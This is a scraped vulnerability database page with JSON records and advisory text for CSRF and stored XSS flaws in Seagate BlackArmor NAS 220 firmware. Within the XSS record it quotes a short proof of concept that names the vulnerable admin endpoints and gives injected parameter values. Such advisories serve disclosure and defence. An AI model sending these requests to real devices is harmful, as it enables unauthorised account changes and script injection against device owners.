            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "path traversal",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-208"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201401-0160

    Vulnerability from variot - Updated: 2025-04-11 22:48

    Multiple cross-site request forgery (CSRF) vulnerabilities in the Seagate BlackArmor NAS 220 devices with firmware sg2000-2000.1331 allow remote attackers to hijack the authentication of administrators for requests that (1) add user accounts via a crafted request to admin/access_control_user_add.php; (2) modify or (3) delete user accounts; (4) perform a factory reset; (5) perform a device reboot; or (6) add, (7) modify, or (8) delete shares and volumes. The Seagate BlackArmor NAS is a network storage device. The BlackArmor NAS 220 storage server is prone to the following remote security vulnerabilities: 1. Multiple cross-site request forgery vulnerabilities 2. Multiple HTML-injection vulnerabilities 3. An arbitrary code-execution vulnerability. Attackers can exploit these issues to perform certain unauthorized actions, execute HTML and script code, steal cookie-based authentication credentials, and execute arbitrary code. Other attacks are possible. BlackArmor NAS 220 running firmware sg2000-2000.1331 is vulnerable; other versions may also be affected. It can provide layered protection, data increment and system backup and recovery for business-critical data.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201401-0160",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "blackarmor nas 220",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "seagate",
            "version": "sg2000-2000.1331"
          },
          {
            "model": "blackarmor nas 220",
            "scope": "eq",
            "trust": 1.8,
            "vendor": "seagate",
            "version": "st320005lsa10g-rk"
          },
          {
            "model": "blackarmor nas 220",
            "scope": "eq",
            "trust": 1.8,
            "vendor": "seagate",
            "version": "st340005lsa10g-rk"
          },
          {
            "model": "blackarmor nas 220",
            "scope": "eq",
            "trust": 1.8,
            "vendor": "seagate",
            "version": "stav6000100"
          },
          {
            "model": "technology llc blackarmor nas sg2000-2000.1331",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "seagate",
            "version": "220"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00096"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005885"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-406"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6922"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/h:seagate:blackarmor_nas_220",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:seagate:blackarmor_nas_220_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005885"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Jeroen - IT Nerdbox",
        "sources": [
          {
            "db": "BID",
            "id": "64655"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2013-6922",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CVE-2013-6922",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.9,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 6.8,
                "id": "CNVD-2014-00096",
                "impactScore": 4.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "VHN-66924",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2013-6922",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2013-6922",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2014-00096",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201401-406",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-66924",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00096"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66924"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005885"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-406"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6922"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple cross-site request forgery (CSRF) vulnerabilities in the Seagate BlackArmor NAS 220 devices with firmware sg2000-2000.1331 allow remote attackers to hijack the authentication of administrators for requests that (1) add user accounts via a crafted request to admin/access_control_user_add.php; (2) modify or (3) delete user accounts; (4) perform a factory reset; (5) perform a device reboot; or (6) add, (7) modify, or (8) delete shares and volumes. The Seagate BlackArmor NAS is a network storage device. BlackArmor NAS 220 storage server is prone to the following remote security vulnerabilities:\n1. Multiple cross-site request forgery vulnerabilities\n2. Multiple HTML-injection vulnerabilities\n3. An arbitrary code-execution vulnerability\nAttackers can exploit these issues to perform  certain unauthorized actions, execute HTML and script code and steal  cookie-based authentication credentials and execute arbitrary code.  Other attacks are possible. \nBlackArmor NAS 220 running firmware sg2000-2000.1331 is vulnerable; other versions may also be affected. It can provide layered protection, data increment and system backup and recovery for business-critical data",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-6922"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005885"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00096"
          },
          {
            "db": "BID",
            "id": "64655"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66924"
          }
        ],
        "trust": 2.52
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-66924",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-66924"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2013-6922",
            "trust": 3.4
          },
          {
            "db": "SECUNIA",
            "id": "56047",
            "trust": 2.5
          },
          {
            "db": "EXPLOIT-DB",
            "id": "30726",
            "trust": 2.3
          },
          {
            "db": "BID",
            "id": "64655",
            "trust": 0.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005885",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-406",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2014-00096",
            "trust": 0.6
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-84093",
            "trust": 0.1
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-61289",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "124686",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-66924",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00096"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66924"
          },
          {
            "db": "BID",
            "id": "64655"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005885"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-406"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6922"
          }
        ]
      },
      "id": "VAR-201401-0160",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00096"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66924"
          }
        ],
        "trust": 1.54343433
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00096"
          }
        ]
      },
      "last_update_date": "2025-04-11T22:48:24.365000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "BlackArmor NAS 220",
            "trust": 0.8,
            "url": "http://www.seagate.com/jp/ja/external-hard-drives/network-storage/business/blackarmor-nas-220/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005885"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-352",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-66924"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005885"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6922"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "http://secunia.com/advisories/56047"
          },
          {
            "trust": 1.7,
            "url": "http://www.exploit-db.com/exploits/30726"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6922"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6922"
          },
          {
            "trust": 0.6,
            "url": "http://www.exploit-db.com/exploits/30726/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00096"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66924"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005885"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-406"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6922"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00096"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66924"
          },
          {
            "db": "BID",
            "id": "64655"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005885"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-406"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6922"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-08T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-00096"
          },
          {
            "date": "2014-01-21T00:00:00",
            "db": "VULHUB",
            "id": "VHN-66924"
          },
          {
            "date": "2014-01-06T00:00:00",
            "db": "BID",
            "id": "64655"
          },
          {
            "date": "2014-01-23T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005885"
          },
          {
            "date": "2014-01-21T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201401-406"
          },
          {
            "date": "2014-01-21T16:06:19.763000",
            "db": "NVD",
            "id": "CVE-2013-6922"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-01-08T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2014-00096"
          },
          {
            "date": "2014-01-22T00:00:00",
            "db": "VULHUB",
            "id": "VHN-66924"
          },
          {
            "date": "2015-03-19T09:05:00",
            "db": "BID",
            "id": "64655"
          },
          {
            "date": "2014-01-23T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-005885"
          },
          {
            "date": "2014-03-12T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201401-406"
          },
          {
            "date": "2025-04-11T00:51:21.963000",
            "db": "NVD",
            "id": "CVE-2013-6922"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-406"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate BlackArmor NAS 220 Device firmware cross-site request forgery vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-005885"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "cross-site request forgery",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-406"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201401-0161

    Vulnerability from variot - Updated: 2025-04-11 22:48

    Multiple cross-site scripting (XSS) vulnerabilities in Seagate BlackArmor NAS 220 devices with firmware sg2000-2000.1331 allow remote attackers to inject arbitrary web script or HTML via the (1) fullname parameter to admin/access_control_user_edit.php or (2) workname parameter to admin/network_workgroup_domain.php. The Seagate BlackArmor NAS is a network storage device. The workgroup configuration is subject to a persistent cross-site scripting attack. When a user is added to the device, the application does not properly filter the user name field data, allowing the attacker to exploit the vulnerability to inject malicious scripts or HTML code. BlackArmor NAS 220 storage server is prone to the following remote security vulnerabilities: (1) multiple cross-site request forgery vulnerabilities, (2) multiple HTML-injection vulnerabilities, and (3) an arbitrary code-execution vulnerability. Attackers can exploit these issues to perform certain unauthorized actions, execute HTML and script code, steal cookie-based authentication credentials, and execute arbitrary code. Other attacks are possible. BlackArmor NAS 220 running firmware sg2000-2000.1331 is vulnerable; other versions may also be affected. The device can provide layered protection, data increment and system backup and recovery for business-critical data. The vulnerability is caused by the admin/access_control_user_edit.php script not adequately filtering the 'fullname' parameter and the admin/network_workgroup_domain.php script not properly filtering the 'workname' parameter.

    Exploit Title: Seagate BlackArmor NAS - Multiple Persistent Cross Site Scripting Vulnerabilities

    Google Dork: N/A

    Date: 04-01-2014

    Exploit Author: Jeroen - IT Nerdbox

    Vendor Homepage: http://www.seagate.com/

    Software Link: http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/

    Version: sg2000-2000.1331

    Tested on: N/A

    CVE : CVE-2013-6923

    Description:

    When adding a user to the device, it is possible to enter a full name. This input field does not sanitize its input, so any payload entered there is executed when the page is reloaded. The Work Group name input field does not sanitize its input either.

    This vulnerability was reported to Seagate in September 2013; the vendor stated that it will not be fixed.

    Proof of Concept #1:

    POST: http(s)://<url | ip>/admin/access_control_user_edit.php?id=2&lang=en

    Parameters:

    index = 2

    fullname = alert(1);

    submit = Submit

    Proof of Concept #2:

    POST: http(s)://<url | ip>/admin/network_workgroup_domain.php?lang=en&gi=n003

    Parameter:

    workname = ">


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201401-0161",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "blackarmor nas 220",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "seagate",
            "version": "sg2000-2000.1331"
          },
          {
            "model": "blackarmor nas 220",
            "scope": "eq",
            "trust": 1.8,
            "vendor": "seagate",
            "version": "st320005lsa10g-rk"
          },
          {
            "model": "blackarmor nas 220",
            "scope": "eq",
            "trust": 1.8,
            "vendor": "seagate",
            "version": "st340005lsa10g-rk"
          },
          {
            "model": "blackarmor nas 220",
            "scope": "eq",
            "trust": 1.8,
            "vendor": "seagate",
            "version": "stav6000100"
          },
          {
            "model": "technology llc blackarmor nas sg2000-2000.1331",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "seagate",
            "version": "220"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00094"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001028"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-126"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6923"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/h:seagate:blackarmor_nas_220",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:seagate:blackarmor_nas_220_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001028"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Jeroen - IT Nerdbox",
        "sources": [
          {
            "db": "BID",
            "id": "64655"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2013-6923",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2013-6923",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CNVD-2014-00094",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-66925",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2013-6923",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2013-6923",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2014-00094",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201401-126",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-66925",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2014-00094"
          },
          {
            "db": "VULHUB",
            "id": "VHN-66925"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-001028"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201401-126"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-6923"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple cross-site scripting (XSS) vulnerabilities in Seagate BlackArmor NAS 220 devices with firmware sg2000-2000.1331 allow remote attackers to inject arbitrary web script or HTML via the (1) fullname parameter to admin/access_control_user_edit.php or (2) workname parameter to admin/network_workgroup_domain.php. The Seagate BlackArmor NAS is a network storage device. The workgroup configuration is subject to a persistent cross-site scripting attack. When a user is added to the device, the application does not properly filter the user name field data, allowing the attacker to exploit the vulnerability to inject malicious scripts or HTML code. BlackArmor NAS 220 storage server is prone to the following remote security vulnerabilities:\n1. Multiple cross-site request forgery vulnerabilities\n2. Multiple HTML-injection vulnerabilities\n3. An arbitrary code-execution vulnerability\nAttackers can exploit these issues to perform  certain unauthorized actions, execute HTML and script code and steal  cookie-based authentication credentials and execute arbitrary code.  Other attacks are possible. \nBlackArmor NAS 220 running firmware sg2000-2000.1331 is vulnerable; other versions may also be affected. It can provide layered protection, data increment and system backup and recovery for business-critical data. The vulnerability is caused by the admin/access_control_user_edit.php script not adequately filtering the \u0027fullname\u0027 parameter and the admin/network_workgroup_domain.php script not properly filtering the \u0027workname\u0027 parameter . 
